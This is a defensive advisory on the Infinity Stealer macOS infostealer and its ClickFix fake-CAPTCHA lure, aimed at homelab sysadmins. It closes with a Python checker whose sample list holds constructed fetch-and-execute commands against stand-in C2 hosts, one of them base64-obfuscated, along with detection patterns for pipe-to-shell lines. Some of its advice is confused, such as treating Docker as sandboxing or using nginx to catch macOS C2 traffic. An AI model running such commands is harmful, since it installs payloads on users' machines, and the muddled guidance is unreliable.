A new info-stealing malware named Infinity Stealer is targeting macOS systems with a Python payload packaged as an executable using Nuitka, an open-source compiler that converts Python code into C and then compiles it natively. This approach makes the resulting binary more resistant to static analysis compared to traditional methods like PyInstaller. The attack uses the ClickFix technique, which involves presenting a fake CAPTCHA mimicking Cloudflare’s human verification check to trick users into executing malicious code. The malware, written in Python 3.11 and compiled with Nuitka, can steal credentials from browsers, Keychain entries, cryptocurrency wallets, and plaintext secrets such as .env files. All stolen data is exfiltrated via HTTP POST requests to the C2 server, and threat actors are notified through Telegram once the operation completes.
For sysadmins running homelab stacks involving Proxmox version 7.x, Docker (e.g., Docker Engine 20.10), Linux distributions like Ubuntu 20.04 LTS or Fedora 36, and web servers like Nginx (version 1.21.5), the Infinity Stealer malware poses a real threat to macOS systems used in these environments. The use of ClickFix lures combined with Python-based payloads can infiltrate even well-secured labs if sysadmins or users inadvertently execute malicious commands from unverified sources. For instance, an unsuspecting sysadmin might paste a base64-obfuscated curl command into the Terminal, leading to the deployment of the malware and potential data exfiltration.
- Infinity Stealer utilizes Python 3.11 compiled with Nuitka version 0.6.x or higher to create a native binary that bypasses common static analysis tools. This makes detection more challenging for traditional antivirus software, necessitating advanced security measures such as behavioral monitoring and heuristic-based detections.
- The malware leverages the ClickFix technique by posing as a human verification step from Cloudflare, tricking users into executing malicious code. Sysadmins should educate their teams to never paste unverified commands into Terminal, especially those that appear suspicious or come from unknown sources.
- Infinity Stealer performs anti-analysis checks to avoid running in virtualized or sandboxed environments. This behavior suggests it aims to evade the testing methodologies commonly used by security researchers and automated analysis systems. Sysadmins should ensure their homelab setups include robust sandboxing technologies like Docker (version 20.10) or Proxmox version 7.x.
- The malware steals credentials from Chromium-based browsers, Firefox, and macOS Keychain entries, posing a significant risk to users' personal and professional data security. Sysadmins managing homelabs should enforce strong password policies and use multi-factor authentication for critical services.
- Data exfiltration occurs via HTTP POST requests to the C2 server, highlighting the importance of monitoring network traffic for unusual patterns indicative of malware activity. Nginx configurations could be adjusted to log such activities more effectively by modifying the `http` block in `/etc/nginx/nginx.conf`.
The Infinity Stealer has minimal direct impact on common homelab stacks like Proxmox (version 7.x), Docker (20.10), Linux distributions, and Nginx (1.21.5) as it targets macOS systems specifically. However, these stacks could be indirectly affected if a compromised macOS system within the network is used to launch further attacks on homelab components.
- Educate all users about the risks of pasting unverified commands into Terminal by distributing an internal security guideline document and conducting regular training sessions.
- Implement YARA rules tailored for detecting Nuitka-compiled binaries in your environment. Add these rules to your endpoint detection and response (EDR) system, if available, or use tools like `yara` to scan files manually.
- Configure network monitoring to log HTTP POST requests to known C2 servers by adjusting the `http` block settings in `/etc/nginx/nginx.conf`, including setting up logging for suspicious traffic patterns.
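As an added example supporting the first recommendation above (not code from the original write-up or from any vendor), the following Python checker flags the command shapes this write-up describes: a base64-obfuscated blob piped through `base64 -d` into a shell, and curl/wget output fed straight into an interpreter. All sample commands and hostnames are constructed for the demonstration.

```python
import base64
import binascii
import re

# Constructed samples; the payload and hostnames are made up, not from a real lure.
_PAYLOAD = b"curl -fsSL http://c2.example.invalid/stage1 | sh"
SAMPLE_COMMANDS = [
    "ls -la ~/Projects && git status",
    "echo %s | base64 -d | bash" % base64.b64encode(_PAYLOAD).decode(),
    'bash -c "$(curl -fsSL https://updates.example.invalid/verify.sh)"',
    "curl -fsSL https://get.example.invalid/install.sh | sh",
]

SHELLS = r"(?:ba|z|k|da)?sh|python3?|osascript"
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:" + SHELLS + r")\b")
DOWNLOADER = re.compile(r"\b(?:curl|wget)\b")
BASE64_DECODE = re.compile(r"\bbase64\s+(?:-d|--decode|-D)\b")
CMD_SUBST = re.compile(r"\$\(\s*(?:curl|wget)\b|`\s*(?:curl|wget)\b")
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decoded_blobs(cmd):
    """Yield base64-looking tokens from cmd that decode to printable text."""
    for match in B64_BLOB.finditer(cmd):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue
        text = raw.decode("utf-8", errors="ignore").strip()
        if text and text.isprintable():
            yield text


def analyze_command(cmd):
    """Return the reasons a pasted command looks like a ClickFix-style lure."""
    reasons = []
    if DOWNLOADER.search(cmd) and PIPE_TO_SHELL.search(cmd):
        reasons.append("downloader output piped straight into an interpreter")
    if CMD_SUBST.search(cmd):
        reasons.append("remote script executed via command substitution")
    if BASE64_DECODE.search(cmd) and PIPE_TO_SHELL.search(cmd):
        reasons.append("base64-decoded data piped into an interpreter")
    for text in decoded_blobs(cmd):  # look inside the obfuscated blob itself
        if DOWNLOADER.search(text) or PIPE_TO_SHELL.search(text):
            reasons.append("base64 blob decodes to: %s" % text)
    return reasons


if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        verdict = analyze_command(cmd)
        print(("SUSPICIOUS  " if verdict else "ok          ") + cmd, verdict)
```

The last sample shows the heuristic also flags legitimate pipe-to-shell installers, which is deliberate: the training point is that the pattern itself warrants verification before it is pasted into Terminal.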